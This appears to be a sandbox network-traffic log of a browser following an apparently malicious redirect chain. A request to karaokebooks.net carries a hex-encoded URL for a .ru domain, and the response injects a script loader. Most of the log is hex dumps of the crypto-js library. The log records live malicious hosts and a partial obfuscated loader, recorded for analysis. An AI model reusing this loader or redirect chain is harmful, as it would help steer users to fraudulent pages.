                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28
                                                                                                                              Data Ascii: clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(
                                                                                                                              2024-12-04 20:15:53 UTC1369INData Raw: 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e
                                                                                                                              Data Ascii: ),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.44973969.49.245.1724433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:53 UTC418OUTGET /res444.php?2-68747470733a2f2f68366e2e7873777062736d782e72752f396443502f-clover HTTP/1.1
                                                                                                                              Host: karaokebooks.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:53 UTC196INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:52 GMT
                                                                                                                              Server: Apache
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/javascript;charset=UTF-8
                                                                                                                              2024-12-04 20:15:53 UTC1980INData Raw: 37 62 30 0d 0a 20 20 20 20 76 61 72 20 44 42 42 64 53 54 47 58 53 56 6a 56 64 67 69 7a 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 44 42 42 64 53 54 47 58 53 56 6a 56 64 67 69 7a 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 44 42 42 64 53 54 47 58 53 56 6a 56 64 67 69 7a 29 3b 0d 0a 44 42 42 64 53 54 47 58 53 56 6a 56 64 67 69 7a 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                              Data Ascii: 7b0 var DBBdSTGXSVjVdgiz = document.createElement("script");DBBdSTGXSVjVdgiz.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(DBBdSTGXSVjVdgiz);DBBdSTGXSVjVdgiz.onload=function()


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449741104.17.25.144433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:55 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:55 UTC964INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:55 GMT
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 267519
                                                                                                                              Expires: Mon, 24 Nov 2025 20:15:55 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhVZVVsKrqa4xJGWJjzxGFaBSzpETI9h0yfSyAh6jFEfiDbbwjbXqMkkRiUxiy3%2FskqI%2Bn6UW6j1O48SFtKkxdBInqo%2BuBWwKHMORAVyNFdbwsXwYghch%2FEC7e1auws3C7i39%2Fug"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ece78a53ad9c33c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-12-04 20:15:55 UTC405INData Raw: 37 62 65 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                              Data Ascii: 7be5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74
                                                                                                                              Data Ascii: o&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==t
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 61 72 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a
                                                                                                                              Data Ascii: ar o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f
                                                                                                                              Data Ascii: arse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._do
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 2c 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d
                                                                                                                              Data Ascii: ,255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 30 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29
                                                                                                                              Data Ascii: 092+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                                                                                              Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                                                                                              Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                                                                                              Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                                                                                              2024-12-04 20:15:55 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                                                                                              Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449745172.67.164.1644433336C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-04 20:15:57 UTC649OUTGET /9dCP/ HTTP/1.1
                                                                                                                              Host: h6n.xswpbsmx.ru
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-12-04 20:15:57 UTC1213INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 04 Dec 2024 20:15:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache, private
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VqYsq6Mky2yjM8BF61pGM9dUbUKCuACpqBGnuupzBQwqVoHrSLSakV0uqj9dm587IgLf5t98U265eS3MkCChv4qEwegxFv8iU9zaA1xSJLoU5OOSHrd3lvCye8DmPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1742&rtt_var=529&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1557&delivery_rate=2194248&cwnd=244&unsent_bytes=0&cid=f54f9c602470fc3a&ts=198&x=0"
                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IkNEZVg2aXVlRE03K1ZlZ2l4V2hzWEE9PSIsInZhbHVlIjoiUDNOb0Fya1kwNjdVV0xqZHNrUmFuMUY4RTAxM09id0pRZ2ZJS0NBRmJVN3dxYTQzQ2c1Y0YrZUdlRzNSWHhYZ01TNVYyZ1hWUjYvSDY5bkh6WVdpazhNRVcrYkRpckUvOWdFY3FiWU1rcGtlSG5mMG9qZmdyN1BScFVVTkxXNmUiLCJtYWMiOiI1MDY2MDUwMmNlNjQxNzRkYjk5MjU5ZTcxNmYwODY0MjBkNTdiZDkyZmMzMTE5OGIxZjZiYTYyYmUxMWU3YjZhIiwidGFnIjoiIn0%3D; expires=Wed, 04-Dec-2024 22:15:57 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                              2024-12-04 20:15:57 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 78 70 59 57 56 31 65 45 64 72 4d 32 51 77 56 44 4a 34 4d 47 56 68 63 7a 67 77 57 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 69 74 79 56 55 34 79 53 6b 70 6f 54 48 4a 51 4e 6d 6b 72 53 31 55 76 62 31 70 48 64 30 39 79 4e 32 4a 6a 61 47 6c 76 52 6d 78 72 65 56 6b 72 59 55 56 4d 51 30 64 51 52 33 52 7a 54 54 45 33 5a 30 6f 79 4e 6a 64 45 57 6c 51 32 61 55 4d 7a 4d 6d 64 55 63 57 5a 59 4e 6d 73 35 5a 58 46 7a 64 47 51 77 63 7a 4a 72 4c 31 68 47 64 6e 70 51 61 6e 5a 72 54 6d 56 44 51 56 4e 44 53 47 5a 42 4d 31 6c 56 62 54 68 34 56 48 6c 49 4d 56 42 43 4f 54 46 58 65 6b 74 51 61 58 68 46 51 33 46 51 64 45 78 58 64 45 70 52 55 46 59
